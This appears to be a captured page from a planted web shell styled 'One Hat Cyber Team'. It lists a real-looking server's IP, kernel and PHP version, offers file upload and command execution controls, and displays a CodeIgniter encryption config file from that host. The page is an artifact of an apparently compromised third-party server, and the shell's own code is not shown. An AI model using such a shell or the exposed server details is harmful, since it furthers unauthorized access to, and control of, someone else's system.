⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.1
Server IP:
103.138.189.55
Server:
Linux s11638.sgp1.stableserver.net 5.14.0-570.32.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Aug 6 11:30:41 EDT 2025 x86_64
PHP Version:
7.2.34
Buat File
|
Buat Folder
Upload File
Eksekusi
Dir :
~
/
home
/
stikesnh
/
app
/
Config
/
Viewing : Encryption.php
<?php namespace Config; use CodeIgniter\Config\BaseConfig; /** * Encryption configuration. * * These are the settings used for encryption, if you don't pass a parameter * array to the encrypter for creation/initialization. */ class Encryption extends BaseConfig { /* |-------------------------------------------------------------------------- | Encryption Key Starter |-------------------------------------------------------------------------- | | If you use the Encryption class you must set an encryption key (seed). | You need to ensure it is long enough for the cipher and mode you plan to use. | See the user guide for more info. */ public $key = ''; /* |-------------------------------------------------------------------------- | Encryption driver to use |-------------------------------------------------------------------------- | | One of the supported drivers, eg 'OpenSSL' or 'Sodium'. | The default driver, if you don't specify one, is 'OpenSSL'. */ public $driver = 'OpenSSL'; }